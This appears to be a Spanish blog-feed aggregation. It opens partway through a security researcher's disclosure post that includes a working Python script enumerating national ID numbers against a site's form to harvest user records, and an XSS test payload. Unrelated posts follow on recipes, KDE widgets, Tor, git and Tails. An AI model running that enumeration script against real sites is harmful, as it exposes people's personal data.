    header = {"Content-Type": "application/x-www-form-urlencoded"}
    usuarios = 0
    prueba = 1
    f = open("DNIs.txt", "a")
    # Pregunta cuantos usuarios se desean obtener
    numUsuarios = raw_input("¿Cuantos usuarios quieres sacar? ")
    if int(numUsuarios) == 1:
            numeroDNI = raw_input("Introducir numero de DNI ")
    while usuarios < int(numUsuarios):
            # Genera un DNI aleatorio
            numero = randint(10000000, 99999999)
            if int(numUsuarios) == 1:
                    numero = int(numeroDNI)
            intnumero = int(numero)
            letra1 = "TRWAGMYFPDXBNJZSQVHLCKET"
            resto = intnumero%23
            letra = letra1[resto]
            # Prepara la informacion que se enviara por el metodo POST
            data = "documento=" + str(intnumero) + "&tipo_documento=+&letra=" + letra + "&test=test"
            # Realiza la peticion
            try:
                    resp = requests.post(URL+path, data=data, verify=False, timeout=3, headers=header)
                    tamano = int(resp.headers["Content-Length"])
            except requests.exceptions.ReadTimeout:
                    tamano = 7000
            # Comprueba si existe o no el usuario
            if tamano < 6000 and tamano > 5000:
                    print "DNI encontrado: " + str(numero) + letra
                    f.write("DNI encontrado: " + str(numero) + letra)
                    parser = MyHTMLParser()
                    parser.feed(resp.content)
                    usuarios = usuarios + 1
            else:
                    print "Intento numero: " + str(prueba) + " - Usuarios encontrados: " + str(usuarios)
                    prueba = prueba + 1
    f.close()

Por último, y ya de verdad prometo que acabo, todos los parámetros eran vulnerables a XSS, el payload que usé fue este:

"><script>alert(document.domain)</script>

Ya hemos acabado por hoy, espero que os haya resultado interesante el post.

Saluti.

Ia e perdio la cuenta de cuantas vulneravilidades tenia


A raiz de este post se pusieron en contacto conmigo para arreglar las vulnerabilidades y disculparse por no responder en el primer reporte.

Actualmente la página se encuentra en reparación y no se puede acceder. Alegra que se hagan las cosas bien.

Originalmente escrito en: https://www.whateversec.com/2019/01/cuantos-fallos-de-seguridad-puede-tener.html

10 Feb 15:06

EL COMIDISTA | Receta de LENTEJAS con codornices en escabeche

by El Comidista en EL PAÍS

EL COMIDISTA estrena canal en YouTube, ¿A qué esperas para suscribirte? http://cort.as/-7Mg5
Cada semana publicamos nuevos vídeos de gastronomía, recetas, restaurantes, curiosidades del arte culinario y mucho más.
Mikel López Iturriaga y su equipo estrenan canal de YouTube para seguir 'dando la tabarra' con la comida.

¡Suscríbete ya a nuestro canal!: http://cort.as/-7Mg5

El Comidista es una web muy maja que incluye recetas, info sobre trastos de cocina, restaurantes, productos y cualquier tontería que se les ocurra a sus autores.
Lentejas con codornices en escabeche. El Comidista te eneseña la receta del sabroso potaje para deficientes culinarios que consiste en echar cosas en dos cazuelas y dejar que se hagan a fuego lento: http://cort.as/YtRK
Visita ➜ https://elcomidista.elpais.com/
Síguenos en Facebook ➜ https://www.facebook.com/elcomidista/
Síguenos en Twitter ➜ https://twitter.com/ElComidista
Síguenos en Instagram ➜ https://www.instagram.com/elcomidista
10 Feb 14:56

KJumpingCube, jugando a mover dados

by baltolkien

Seguimos presentando algunos juegos de la división más lúdica de KDE (KDEGames). Ya han pasado por esta humilde blog un buen número de juegos de la división KDEGames como KbounceKMahjonggKmines,  KBreakoutKTuberling , Granatier, KSudoku, KGoldrunner y Kolor Lines (o Klines). Hoy ha llegado el turno a KJumpingCube, un juego de lógica con tintes educativos basado en el movimiento de los dados típicos de 6 caras.

KJumpingCube, jugando a mover dados

Hace mucho tiempo que no hablo de juegos de la rama KDE Games. Se trata de KJumpingCube  un juego de estrategia en la que deberemos convertir todos los dados del tablero a tu color bien sea por pinchar sobre ellos o mediante el reparto de puntos de un dado que ya poseas.

Se ha de reconocer que el juego tiene una curva de aprendizaje un poco alta, ya que la dinámica de ganar dados por conquista de puntos es algo confusa al principio.

KJumpingCube, jugando a mover dados

No obstante aquí os dejo una explicación que he encontrado en UpToDown :”En su turno cada jugador podrá convertir de su color un dado del tablero, si el número que indica este dado es igual o superior al de los dados vecinos los puntitos sobrantes se repartirán entre estos. La estrategia viene en el momento en el que comencemos a planificar los movimientos de tal manera que provoquen reacciones de conversión de dados en cadena.”

Además, os invito a ver el siguiente vídeo de Andrew Keenan Richardson.

 

El juego fue realizado por Matthias Kiefer  <matthias.kiefer@gmx.de> y Benjamin Meyer  <ben+kjumpingcube@meyerhome.net>

 

Con la colaboración de Eugene Trounev  < eugene.trounev@gmail.com >, Ian Wadham  < ianw2@optusnet.com.au > y Johann Ollivier Lapeyre  < johann.ollivierlapeyre@gmail.com >

 

Cómo instalar KJumpingCube

Al ser un juego de la rama de KDE su instalación es sumamente sencilla. Básicamente debemos abrir una sesión de la consola y escribir:

En KDE Neon, Kubuntu y Linux Mint: $sudo apt install KJumpingCube

En openSUSE: $sudo zypper install KJumpingCube

[… comenta y añadimos cómo se instala en tu distribución favorita]

 

10 Feb 14:51

Más inteligentes, pero también éticas. Así serán las máquinas en el futuro

by El Futuro Es Apasionante

Entra en nuestra web: http://www.elfuturoesapasionante.com
Suscríbete a nuestro canal de youtube: http://bit.ly/1JHCOQ1
Síguenos en Facebook: https://www.facebook.com/EsApasionante/
Síguenos en Twitter: https://twitter.com/EsApasionante

La ética está considerada como la rama de la filosofía que reflexiona acerca de los comportamientos humanos (sus causas, sus aciertos o errores) desde un punto de vista moral, es decir, desde la bondad o maldad de las conductas. Esta valoración, que supone además la libertad de las personas para elegir sus actos, convierte la ética en una cualidad exclusivamente humana, por lo que resulta paradójico hablar de una ética de las máquinas. Y, sin embargo, se trata de una disciplina necesaria a medida que ponemos cada vez más decisiones en sus manos. En un artículo sobre el tema de Núria Bigas Fortmagé publicado por la Universidad Oberta de Catalunya, el profesor de Filosofía del Derecho de la UOC David Martínez señalaba que “no solo es aconsejable, sino también indispensable, que los algoritmos incluyan parámetros éticos”. Uno de los ejemplos clásicos que se utilizan para argumentar la necesidad de que las futuras inteligencias artificiales tengan una base moral es el de los coches autónomos. Porque aunque existen informes que aseguran que los vehículos sin conductor terminarán por resultar más seguros que los actuales, no es menos cierto que se verán obligados a tomar decisiones en las que habrá en juego vidas humanas. Y, puesto que la ética es una característica de nuestra especie, solo nosotros podemos tratar de enseñársela a las máquinas. De ahí surgen ideas como el proyecto Máquina de la Moral puesto en marcha por el MIT, en el que a través de un juego web se están recogiendo datos para ver cómo reaccionamos ante distintos escenarios con posibles víctimas en un accidente automovilístico.

Francesca Rossi, directora de Ética en Inteligencia Artificial de IBM, cree que, aunque se han hecho muchos avances, todavía tenemos que ser pacientes: “la gente debe entender que la IA es una disciplina que existe desde hace 70 años, pero que todavía se está desarrollando. Tenemos muchos desafíos por delante y muchas cosas que no sabemos hacer”. La mayor capacidad para procesar información de las máquinas, junto con la abrumadora cantidad de datos que generamos en nuestra actividad diaria, hace que los algoritmos sean cada vez más precisos. Pero eso no quiere decir que sean también más éticos, puesto que aprenden de lo que reciben. Hace un par de años, una inteligencia artificial programada por Microsoft, comenzó a mostrar comportamientos racistas, homófobos y antisemitas después de pasar tan solo un día en Twitter. Y un estudio publicado en 2017 en la revista Science aseguraba que muchas inteligencias artificiales se volvían machistas cuando aprendían a comunicarse por palabras, puesto que ese sesgo está implícito en muchos idiomas.

Enfrentar el peligro de que los modelos de aprendizaje basados en comportamientos humanos a gran escala reproduzcan estereotipos y prejuicios existentes en la población, es una de las tareas de Francesca Rossi. “Entender estos temas y tratar de resolverlos sólo puede hacerse de forma multidisciplinar y con una aproximación en la que se tengan en cuenta varios escenarios” asegura Rossi. Una labor en la que deben implicarse en conjunto compañías tecnológicas, gobiernos e instituciones como Naciones Unidas, puesto que nos dirigimos hacia un futuro en el que las máquinas tendrán cada vez mayor importancia en sus relaciones con los humanos.


Entrevista y edición:  Noelia Núñez, David Giraldo
Texto: José L. Álvarez Cedena

#ElFuturoEsApasionante #EsApasionante #Vodafone
08 Feb 21:29

Podcast Ubuntu y otras hierbas S03E02: Software libre en los ciclos formativos... desde dentro

by Marcos Costales
En este nuevo programa, segundo de la tercera temporada Ubuntu y Otras Hierbas, con Francisco Molinero y Javier Teruelo y con la inestimable colaboración de Lidia Montero y José Manuel Blanco,  se adentra en las complejas relaciones entre los ciclos formativos y el software libre y sus potenciales salidas y futuros (y abre algún melón sorpresa).
¿Conseguirá ser ésta la Nueva Generación?

El podcast esta disponible para escuchar en:
05 Feb 17:46

SystemRescueCd 6.0: ahora basado en Arch

by tannhausser
Se ha publicado una nueva versión de SystemRescueCd, una distribución GNU/Linux especializada en la restauración y reparación de sistemas, la cual se puede ejecutar en modo live y hacer uso de sus herramientas especializadas –principalmente– en el manejo de particiones. La nueva SystemRescueCd 6.0 abandona
04 Feb 11:54

#6 Visita a la 54 RUMSX en Barcelona y artículos de enero [podcast]

by davidochobits

Volvemos a la carga con un nuevo programa de podcast y ya llevamos un buen puñado. Os explico de la actividad de la web durante el mes de enero, además de mi experiencia en...

La entrada #6 Visita a la 54 RUMSX en Barcelona y artículos de enero [podcast] se publicó primero en ochobitshacenunbyte.

02 Feb 18:47

Pine64 adelanta especificaciones y precios de sus próximos lanzamientos

by J.Pomeyrol

pine64

Pine64, la compañía conocida por competir con RaspBerry Pi con sus SBC (Single Board Computer) y por comercializar los Pinebook, unos modestos portátiles con Linux basados en arquitectura ARM, estará presente en FOSDEM 2019, donde los asistentes podrán ver parte de en lo que están trabajando para este año, que no es poco.

En una entrada publicada en los foros oficiales de Pine64 han adelantado la lista de productos, así como las especificaciones y precio de los dispositivos que lanzarán en un futuro cercano, entre otros el teléfono y la tableta con KDE Plasma de la que os informamos hace unos meses. Pero no es lo único que tienen planeado.

Los preanuncios hablan del Pinebook Pro, “un portátil ARM 64 bits de alto rendimiento, diseñado estrictamente con FOSS en mente como una computadora portátil Linux de uso diario”; el PinePhone y la PineTab, un smartphone y una tablet respectivamente que se basarían en KDE neon; CUBE, una cámara IP de código abierto; y otro artículos más específicos si cabe, incluyendo las actualizaciones de los modelos de SBC que venden.

PinePhone

Prototipo PinePhone

La idea, en principio, es crear ecosistemas de dispositivos convergentes (SBC, módulos, portátil / tablet / smartphone / otros dispositivos) basados en SOC con los que ya hay desarrolladores que han invertido y con los que están comprometidos“, señalan, advirtiendo que en el FOSDEM “solo se mostrarán prototipos y dispositivos conceptuales“.

Así pues, nada está cerrado, pero está todo en marcha y lo más interesante son las especificaciones y los precios que adelantan para, principalmente, el teléfono y la tableta, que son los productos más especiales que tienen entre manos, de los cuales ya se han enviado los primeros kits de desarrollo a desarrolladores de proyectos como UBPorts, PostMarketOS y Plasma Mobile, entre otros.

El PinePhone montaría un panel IPS de 1440×720, Allwinner A64 con 2GB LPDDR3 RAM, conectividad USB C, HDMI, Bluetooth 4.0 y 4G LTE, mientras que la PineTab repetiría componentes con variaciones como una pantalla IPS de 10 pulgadas y resolución HD (720p). Esto es solo parte de lo que traen ambos dispositivos, y no hace falta saber mucho del tema para prever que no estamos ante lo más potente o novedoso del sector; sin embargo, se trata de productos realmente asequibles.

PineTab

Prototipo PineTab

Según los precios que muestran, el PinPhone saldría ala venta por unos 149 dólares; la PineTab por unos 79 dólares o 99 dólares incluyendo teclado. Os recomendamos leer la entrada enlazada más arriba para conocer todos los detalles, de los que daremos debida cuenta cuando vayan a llegar al mercado. Además, hay otras cosas interesantes, también relacionados con juegos.

Se sabrá más de todo esto en los próximos días, en el marco del FOSDEM 2019, la Free and Open Source Software Developers’ European Meeting que se celebrará este fin de semana en Bruselas.

02 Feb 18:27

KDE está presente en FOSDEM 2019

by baltolkien

Como todos los años, hoy sábado y mañana domingo la gente de KDE está presente en FOSDEM 2019. Esta edición del 2019 promete seguir siendo bastante interesante por varias razones, todas ellas relacionadas por el gran momento que viven algunos de los proyectos de la Comunidad, los cuales se van diversificando y ya abarcan a algunos dispositivos físicos.

KDE está presente en FOSDEM 2019

KDE estará presente en FOSDEMPara aquellos que no lo sepan, FOSDEM (del inglés Free and Open source Software Developers’ European Meeting) es un evento anual de dos días que reúne a la comunidad del Software Libre) y que se celebra desde 2001, con cada vez más participantes, charlas y talleres. Se podría decir que aglutina los proyectos de Software Libre más importantes de la escena actual.

En esta ocasión el evento se celebrará el 2 y el 3 de febrero en el ULB Campus Solbosch y se esperan miles de programadores, diseñadores, mantenedores y jefes de los equipos de los proyecto más  importantes del panorama actual del Software Libre.

Esto se traducirá en interesantes charlas encima de un escenario y, como no, en muchas más alrededor de una cerveza o una taza de café.

KDE está presente en FOSDEM 2019

KDE presente en FOSDEM 2019

Y el proyecto KDE no puede estar presente de este evento y estará representado mediante un stand donde además de poder ver algunos ordenadores con Plasma se realizarán demostraciones de lo último de su Software:

  • Wolthera van Hövell, un talentos artista realizará una demostración de uso de Krita.
  • El domingo Camille Moulin realizará una demostración de como realizar una demostración en vivo de cómo utilizar el editor de vídeo no lineal Kdenlive.
  • También veremos el software de la Comunidad KDE en portátiles potentes como los KDE Slimbook, en otros más modestos (y más económicos) como los Pinebook e incluso en máquinas muy limitadas pero muy versátiles como Raspberry Pi.

Además, varios miembros destacados de la Comunidad estarán presentes como Aleix Pol creador de KAlgebra y Discover; Jonathan Riddell, creador de la iniciativa KDE neon; Bhushan Shah, desarrollador principal de Plasma Mobile; Adriaan de Groot, desarrollador principal del instalador de sistemas operativos Calamares  o Boudewijn Rempt desarrollador de Krita.

En definitiva, un evento que si puedes no debes perderte ya que promete darnos mucho de lo que hablar una vez finalizado.

Más información: KDE.News

02 Feb 18:24

Qué hizo el proyecto Tor en 2018 y los planes para el 2019

by victorhck

El proyecto Tor se encarga de desarrollar unas herramientas claves a la hora de mantener el anonimato y la privacidad en la red. Veamos cual es el balance del 2018 y los objetivos para este 2019.

The Onion Router (Tor)

El proyecto Tor está empeñado en seguir desarrollando y mejorando las herramientas que hacen que podamos navegar libremente por la red sin que estados, ni empresas nos espíen y registren nuestra actividad.

Hace un año, pudiste leer el artículo que publiqué en el blog sobre el resumen de 2017 y los objetivos para 2018. Pasado el año 2018 y comenzando este 2019 es hora de hacer balance de lo acontecido y propósitos para lo que vendrá…

El artículo original en inglés lo puedes leer en su web. En mi blog publico la traducción para difundir… empezamos.

El proyecto Tor ha logrado muchas cosas el pasado año. Han pasado el 2018 luchando por el derecho humano fundamental a la privacidad y la libertad en la red y han hecho su software más accesible de lo que era antes.

En el pasado año, ha habido un cambio significativo en la opinión pública sobre cómo las grandes compañías tecnológicas manejaban nuestros datos e información personal, y cómo estas compañías desarrollaban herramientas para expandir la censura en países represivos.

Por ejemplo se filtraron los planes de Google de lanzar un motor de búsqueda censurado en China (llamado Dragonfly), y se encontraron con unas protestas globales. El mundo está observando.

En el Proyecto Tor, este es un gran momento. Más personas buscando soluciones para proteger de manera efectiva su privacidad. En una encuesta que realizaron encontraron que el 93% de las personas declararon que sabían que necesitaban más protección en la red.

Más personas necesitan herramientas robustas que eludan la censura en todo el mundo. Más personas entienden los riesgos que acarrean los modelos de negocio basados en la vigilancia de internet.

Y han estado trabajando para hacer Tor más accesible que nunca con el objetivo que cualquier persona conectada a la red pueda disfrutar de las protecciones que el software que desarrollan ofrece.

Lo realizado en 2018 se puede resumir en estos puntos:

  • Le han dado a la interfaz de usuario del navegador Tor un repaso con la publicación del Navegador Tor 8.0, haciendo más sencillo y amigable que nunca el utilizarlo.
  • Hacer sencillo a las personas que viven en países que censuran internet y censuran Tor el poder eludir esa censura con la posibilidad de crear puentes desde el propio navegador Tor.
  • Traducir el navegador Tor a 9 nuevos idiomas que antes no había, llegando así a estar disponible en 25 idiomas.
  • Publicar la versión alfa del navegador Tor para Android.
  • Mejorar el núcleo de Tor para dispositivos móviles, optimizando su comportamiento y haciendo sencillo a terceras partes el desarrollar aplicaciones que incluyan Tor.
  • Viajar para encontrarse cara a cara con las personas que colaboran con el Proyecto y tener un “feedback” sin utilizar las populares prácticasinvasivas de recolección de datos.
  • Mejorar la seguridad de los serviciosonion v3 con “vanguards add-on”.
  • Publicar 10 informes de investigación a través de OONI sobre la censura bloqueos de la red en todo el mundo.
  • Recaudar un número recor de donaciones para así reducir su dependencia en la financiación del gobierno. Recibimos donaciones desde 115 países en todo el mundo.
  • Decir adios a Shari Steele, que ayudo al Proyecto Tor a llegar a una nivel de madurez en todo el mundo y dar la bienvenida a nuestra nueva Directora Ejecutiva, Isabela Bagueros.

Todos estos logros, junto con las amenazas a las que se ve expuesta la red, hacen que el 2019 sea el año de probar Tor.

La censura en la red ha continuado incrementándose en todo el mundo, particularmente durante eventos políticos como elecciones o protestas y además la vigilancia que realiza el capitalismo ha crecido.

El Proyecto Tor sabe que su trabajo juega un papel importante para aegurar que las personas que luchan contra las injusticias sean capaces de permanecer a salvo cuando realizan sus tareas en la red, y el Proyecto está preparado para enfrentarse a esos retos.

Para conseguir esos objetivos, tienen pensado en este 2019

  • Publicar la versión estable del navegador Tor para Android, la primera versión oficial del navegador Tor para dispositivos móviles.
  • Mejorar el consumo de batería y memoria del software Tor.
  • Ofrecer más recursos de Tor traducidos y dar más apoyo.
  • Publicar una nueva versión de su sitio web que se ajuste a su guía de estilo y que ofrezca múltiples portales para mejorar la navegación.
  • Continuar consiguiendo diversificar sus fuentes de financiación.
  • Trabajar con el reción equipo anti-censura para abordar la creciente demanda de medios más confiables para eludir la censura donde Tor está bloqueado.
  • Llegar a más comunidades, para entrenarles en Tor y capacitar a las personas de manera local para que estas mismas puedan enseñar a más personas.

Y hay mucho más que se puede hacer.

Si quieres ayudar, hay muchas tareas en las que puedes hacerlo e involucrarte con el proyecto Tor, por ejemplo:

También puedes luchar por los derechos humanos universales de privacidad y libertad y mantener a Tor con fuerza realizando una donación.

02 Feb 18:10

Daily Forecast – Plasmoides de KDE (103)

by baltolkien

Esta semana parece ser la semana de los plasmoides. Si hace unos días os presenté Simple Weather, un plasmoide que nos permite tener un simple widget con la temperatura diaria, con la máxima y la mínima, hoy os presento otro un poco más complejo, con la previsión para varios días. De nuevo, se trata de un plasmoide minimalista.

Daily Forecast – Plasmoides de KDE (103)

Tener un plasmoide meteorológico fue una de las razones por las que me interesaron estos adornos visuales y funcionales que pueblan en ocasiones mi escritorio.

El escritorio Plasma cada vez nos ofrece más posibilidades para que esta información esté  lo más integrada posible dentro de nuestro entorno de trabajo.

Os presento Daily Forecast, otra creación de Zren, un plasmoide minimalista que nos coloca la temperatura actual de la zona que seleccionemos, junto con la máxima y la mínima del día y la previsión a un par de días.

Como en el caso de Simple Weather,  en las opciones generales se puede seleccionar entre 4 servicios meteorológicos y algunas opciones de personalización como intervalo de actualización, tipo de fuente o días de previsión, entre otros detalles.

Daily Forecast – Plasmoides de KDE (103)

 

La instalación de Daily Forecast se realiza desde “Obtener más widgets” del propio escritorio Plasma, así que no hay dificultad ninguna para tenerlo decorando nuestro escritorio.

Y como siempre digo, si os gusta el plasmoide podéis “pagarlo” de muchas formas en la nueva página de KDE Store, que estoy seguro que el desarrollador lo agradecerá: puntúale positivamente, hazle un comentario en la página o realiza una donación. Ayudar al desarrollo del Software Libre también se hace simplemente dando las gracias, ayuda mucho más de lo que os podéis imaginar, recordad la campaña I love Free Software Day 2017 de la Free Software Foundation donde se nos recordaba esta forma tan sencilla de colaborar con el gran proyecto del Software Libre y que en el blog dedicamos un artículo.

Más información: KDE Store

 

¿Qué son los plasmoides?

Para los no iniciados en el blog, quizás la palabra plasmoide le suene un poco rara pero no es mas que el nombre que reciben los widgets para el escritorio Plasma de KDE.

En otras palabras, los plasmoides no son más que pequeñas aplicaciones que puestas sobre el escritorio o sobre una de las barras de tareas del mismo aumentan las funcionalidades del mismo o simplemente lo decoran.

02 Feb 18:08

Instalación de Ansible en GNU Linux

by davidochobits

Ahora que ya nos ha quedado claro qué es Ansible y para que sirve, ya es hora de empezar a trabajar. Lo primero que haremos es ver como instalarlo en un servidor con un...

La entrada Instalación de Ansible en GNU Linux se publicó primero en ochobitshacenunbyte.

02 Feb 17:58

Cómo borrar una rama local y remota en un repositorio #git

by victorhck

En este artículo veremos cómo eliminar eficazmente una rama de desarrollo de nuestro repositorio git tanto de manera local como en el repositorio remoto.

Un nuevo pequeño tutorial de git llega al blog. Lo primero aclarar que git es una grandérrima herramienta y que no soy ningún experto.

Las ramas de desarrollo se utilizan en git, para realizar pruebas y modificaciones del código, sin tocar nada de la rama estable y que sabemos que funciona y que quizás está en producción en algún sitio funcionando.

Trabajar en la rama de pruebas hace que podamos estar tranquilos de hacer modificaciones, sin miedo a “romper” nada importante. Si al final todo está bien unimos al rama de pruebas con la principal y a funcionar.

Si después de las pruebas queremos eliminar esa rama de desarrollo paralela la podemos eliminar sin que deje de funcionar el código estable. Este tutorial trata sobre eso, sobre cómo eliminar esa rama de pruebas tanto de nuestra copia local del repositorio, como del repositorio remoto que está en algún servidor de git.

Si me decido a publicar tutoriales sobre git, es porque alguna vez he tenido la necesidad de hacer algo en especial y buscando he encontrado información sobre cómo hacerlo. Y cuando esta información está en inglés me animo a traducirlo para tratar de difundirlo.

En este caso este artículo es una traducción/adaptación del artículo en inglés de la web linuxize.com a quienes he pedido permiso para poder traducir y publicarlo en mi web. Tienes el artículo en este enlace:

Eliminar una rama de manera local

Para eliminar una rama de manera local en nuestra copia del repositorio utilizaremos el comando git branch con la opción -d (--delete)

git branch -d nombre_de_la_rama

Si tratas de eliminar una rama que contiene cambios en el código que no se han incluido (merged) todavía, saltará una notificación con el siguiente error:

error: The branch 'branch_name' is not fully merged.
If you are sure you want to delete it, run 'git branch -D nombre_de_la_rama'.

Esto nos dice que tenemos que forzar el borrado de la rama utilizando la opción -D ( --delete --force)

git branch -D nombre_de_la_rama

Parece obvio que todos los cambios de la rama que no se hayan incluido (merged) se perderán al borrar dicha rama. Podremos ver qué ramas contienen cambios que todavía no se han incluido mediante el comando:

git branch --no-merged.

Tampoco podremos eliminar una rama si estamos ubicados en ella. Primero tendremos que cambiar de rama y después ya podremos eliminar la rama en la que estábamos:

git branch -d branch_name

Eliminar una rama en el repositorio remoto

Borrar la rama de manera local, no hace que se elimine la rama si esta está en el repositorio remoto (GitLab, gitea, GitHub, etc…) Para eliminarla deberemos hacer un git push añadiendo la opción -d (--delete)

git push origin --delete nombre_de_la_rama

También puede existir la posibilidad de que alguien más con acceso al repositorio haya borrado ya la rama que quieres borrar. Si esto pasa, obtendrás este mensaje al ejecutar el comando anterior

error: unable to push to unqualified destination: branch_name The destination refspec neither matches an existing ref on the remote nor begins with refs/, and we are unable to guess a prefix based on the source ref. error: failed to push some refs to 'git@example.com:/my_repo'

Cuando esto pasa, necesitarás sincronizar tu lista de ramas del repositorio mediante el comando:

git fetch -p

Como hemos visto, de esta manera podremos eliminar una rama que hemos utilizado para probar cosas al margen de la rama principal y que ya hemos hecho “merged” o que queremos sin más eliminarla.

Aquí queda para futuras referencias. ¿Tienes otros trucos para hacerlo? ¿Cómo trabajas esto con git? Compártelo en los comentarios del blog:

02 Feb 17:53

EL COMIDISTA | Usa la salsa de soja para algo más que mojar el sushi

by El Comidista en EL PAÍS

¿Sabías que la salsa de soja puede servir para dar sabor a unos frutos secos, salar unos huevos revueltos o marinar pescado? Aparca los makis por un momento y abre tu mente a una nueva realidad.
Recetas en texto aquí: http://cort.as/-E6wr
Suscríbete a nuestro canal: http://cort.as/-9ysp
Visita: https://elcomidista.elpais.com
Síguenos en Facebook: https://www.facebook.com/elcomidista
Síguenos en Twitter: https://twitter.com/ElComidista
Síguenos en Instagram: https://www.instagram.com/elcomidista
¡Bienvenido al canal oficial de EL COMIDISTA en EL PAÍS! Cada semana publicamos nuevos vídeos de gastronomía, recetas, restaurantes, productos, chaladuras culinarias y mucho más. ¡Suscríbete ya a nuestro canal!: http://cort.as/-9ysp
El Comidista es una web muy maja que incluye recetas, info sobre trastos de cocina, restaurantes, productos y cualquier tontería que se les ocurra a sus autores.
02 Feb 17:46

Latter Spacer – Plasmoides de KDE (102)

by baltolkien

Suma y sigue. Os presento Latter Spacer , un plasmoide minimalista con el que podemos añadir un espacio en blanco de dimensiones personalizable en cualquier barra de tareas del escritorio Plasma.

Latter Spacer – Plasmoides de KDE (102)

Os presento Latter Spacer, una creación de Psifidotos un simple plasmoide que nos permite tener un espacio en blanco en cualquier barra de tareas que añadamos a nuestro escritorio Plasma de la Comunidad KDE.

Este plasmoide nace del ecosistema del famoso Latte Dock ya que comparte desarrollador. Entre sus opciones tamaño tenemos tres posibilidades:

  • Basado en píxeles.
  • Basado en la anchura de la barra de tareas.
  • Basado en el espacio disponible.

Latter Spacer – Plasmoides de KDE (102)

 

La instalación de Latter Spacer se realiza desde “Obtener más widgets” del propio escritorio Plasma, así que no hay dificultad ninguna para tenerlo decorando nuestro escritorio.

Y como siempre digo, si os gusta el plasmoide podéis “pagarlo” de muchas formas en la nueva página de KDE Store, que estoy seguro que el desarrollador lo agradecerá: puntúale positivamente, hazle un comentario en la página o realiza una donación. Ayudar al desarrollo del Software Libre también se hace simplemente dando las gracias, ayuda mucho más de lo que os podéis imaginar, recordad la campaña I love Free Software Day 2017 de la Free Software Foundation donde se nos recordaba esta forma tan sencilla de colaborar con el gran proyecto del Software Libre y que en el blog dedicamos un artículo.

Más información: KDE Store

 

¿Qué son los plasmoides?

Para los no iniciados en el blog, quizás la palabra plasmoide le suene un poco rara pero no es mas que el nombre que reciben los widgets para el escritorio Plasma de KDE.

En otras palabras, los plasmoides no son más que pequeñas aplicaciones que puestas sobre el escritorio o sobre una de las barras de tareas del mismo aumentan las funcionalidades del mismo o simplemente lo decoran.

02 Feb 17:45

Las cuatro cosas que cada uno debemos hacer para frenar el cambio climático

by El Futuro Es Apasionante

Entra en nuestra web: http://www.elfuturoesapasionante.com
Suscríbete a nuestro canal de youtube: http://bit.ly/1JHCOQ1
Síguenos en Facebook: https://www.facebook.com/EsApasionante/
Síguenos en Twitter: https://twitter.com/EsApasionante

“Todos los días hay buenas noticias, lo que pasa es que la prensa le pone más énfasis a las malas noticias. Pero eso no quiere decir que no estén sucediendo las cosas correctas. La verdad es que si uno busca la información positiva, la encuentras todos los días”, la afirmación de Christiana Figueres no es otra invitación más a echarle la culpa al mensajero. Un recurso muy socorrido cuando los temas son tan complejos que nadie quiere hacerse responsable de ellos.Y en verdad, el tema del que se ocupa esta diplomática costarricense es el más complejo e importante de todos, puesto que ella es la más alta funcionaria de Naciones Unidas para el cambio climático. Obviamente hablar de buenas noticias en un terreno en el que lo que está en juego es nada menos que el futuro de la especie, no es una broma. Y, sin embargo, a pesar de la mala pinta que tienen los titulares más tenebrosos y las complicaciones de la geopolítica, Figueres no está sola en esta pequeña mirada esperanzadora. El pasado mes de diciembre, Bloomberg publicaba un artículo titulado “Algunas pequeñas buenas noticias sobre el cambio climático” y señalaba que era importante destacar que “Diecinueve países, incluidos los los Estados Unidos y Gran Bretaña han experimentado una década de crecimiento económico y menores emisiones de dióxido de carbono. La capacidad de energía renovable se encuentra en un nivel récord y la quema de carbón podría haber alcanzado su punto máximo”.

Por supuesto, que haya algunas buenas noticias, no significa que esté todo el trabajo hecho. En realidad, apenas hemos comenzado. Y Figueres es consciente de ello: “nosotros no vamos a solucionar el cambio climático. El acuerdo de París lo que busca es eliminar la franja de mayor peligro”. Sabemos, porque los científicos no dejan de alertar sobre ello, que ya hay algunas consecuencias irreversibles, y también que en los próximos años veremos alteradas las temperaturas o los ciclos hidrológicos del planeta. Pero los más optimistas creen que estamos a tiempo de paliar los efectos más terribles, cambiando una tendencia negativa.

En un documento de Naciones Unidas Figueres aseguraba que no debe desdeñarse la importancia de lo que se está haciendo desde distintas instituciones: "Esta es la primera vez en la historia de la humanidad que estamos creando nosotros mismos la tarea de, intencionadamente, y en un plazo de tiempo determinado, cambiar el modelo de desarrollo económico que ha reinado, al menos, durante 150 años, o lo que es lo mismo, desde la revolución industrial. Eso no va a suceder de la noche a la mañana y no va a ocurrir en una sola conferencia sobre cambio climático”. Por eso nos anima a todos -gobiernos, empresas, individuos- a ponernos en marcha. Y señala cuatro comportamientos esenciales: dejar de consumir carne, apostar por un transporte eficiente, no invertir nuestros ahorros en industrias o actividades industriales que contaminen, y por últimos ser responsables con nuestro voto y dar la espalda a aquellos políticos que niegan la evidencia del cambio climático. Como luchadora incansable que es, Christiana Figueres se niega a entregarse al pesimismo, pero tampoco es una ingenua y advierte de la importancia de todos nuestros actos porque, en materia de clima, lo seguro es que en los próximos años “la cosa se va a poner peor”.


Entrevista y edición:  Azahara Mígel, Noelia Núñez, Douglas Belisario
Texto: José L. Álvarez Cedena

#ElFuturoEsApasionante #EsApasionante #Vodafone
02 Feb 17:32

Publicada Tails 3.12 y el navegador Tor 8.05

by victorhck

Se acaban de publicar nuevas versiones tanto Tails, la distribución de GNU/Linux orientada a la privacidad y anonimato y del navegador Tor.

Captura de Tails y el navegador Tor

En el blog ya has podido leer en otras ocasiones qué es eso de Tails. En resumen podemos decir que es una distribución de GNU/Linux basada en Debian a la que se le han hecho algunos retoques.

Es una distribución pensada para ser ejecutada en “modo live”. ¿Qué es eso? que no necesitarás instalar nada en tu PC. Simplemente tendrás que copiarla en un dispositivo USB, arrancar tu ordenador desde ese dispositivo y se iniciará el sistema Tails.

Cuando termines, apagues el PC y retires la USB no quedará ni rastro del uso de Tails en tu PC. Hasta la próxima vez que quieras utilizarlo, tendrás que conectar de nuevo la USB y volver a iniciar tu equipo desde el.

El equipo de desarrollo de Tails ha publicado el pasado 29 de enero de 2018 la versión 3.12 de este sistema operativo ideal para quienes quieren mantener conexiones seguras en PC’s con pocas garantías (confidentes, informantes, periodistas, hacktivistas, activistas de derechos humanos, personas concienciadas de su privacidad… o tu mismo/a)

Lo más novedoso de esta nueva edición es que la imagen de descarga de Tails ya no se distribuye en un archivo .ISO pensada para dispositivos ópticos como Cd, si no en un .img orientada a memorias USB.

Además de esta novedad, también se ha ido mejorando en otros aspectos y corrigiendo errores encontrados y reportados, además de actualizar el software incluido a versiones más modernas.

